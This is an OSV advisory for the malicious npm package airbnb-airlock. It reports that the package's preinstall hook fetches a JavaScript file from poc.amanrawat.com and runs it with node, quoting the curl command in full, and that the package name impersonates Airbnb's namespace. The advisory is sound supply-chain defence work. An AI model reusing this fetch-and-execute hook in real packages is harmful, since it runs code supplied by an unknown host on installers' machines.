MAL-2026-6293

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/airbnb-airlock/MAL-2026-6293.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6293

Published

2026-06-23T14:11:48Z

Modified

2026-06-23T14:31:21.093109907Z

Summary

Malicious code in airbnb-airlock (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)

The package's preinstall lifecycle hook in package.json runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during npm install. The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43",
            "id": "IN-MAL-2026-007205",
            "source": "amazon-inspector",
            "modified_time": "2026-06-23T14:11:48Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-06-23T14:23:03.286857051Z"
        }
    ]
}

References

https://www.npmjs.com/package/airbnb-airlock/v/99.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / airbnb-airlock

Package

Name: airbnb-airlock; View open source insights on deps.dev
Purl: pkg:npm/airbnb-airlock

Affected ranges

Affected versions

99.*

99.0.0

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/airbnb-airlock/MAL-2026-6293.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "tlsh": "76e026348920107719c402d28c3aa40bd6c24e3b0104380d939b042cd0de93798fe31e",
            "sha256": "be1334c8fea52b8780ac6d2e4c9db381366d62eeab8190fbaf53ddc21788eae7",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "airbnb-airlock-99.0.0.tgz",
            "hashes": {
                "sha1": "f5300e734c06a9de2a18a7b544cc33a212f87f96",
                "sha512_sri": "sha512-YrHSLJsTMwrg7t1Cyq32Si11kk9JcE5yTcoPiAPRs+DS/Dg8tFhOCu7ytOrhfptGgu6xbtujJHmp/c9llNGaTw=="
            }
        }
    ]
}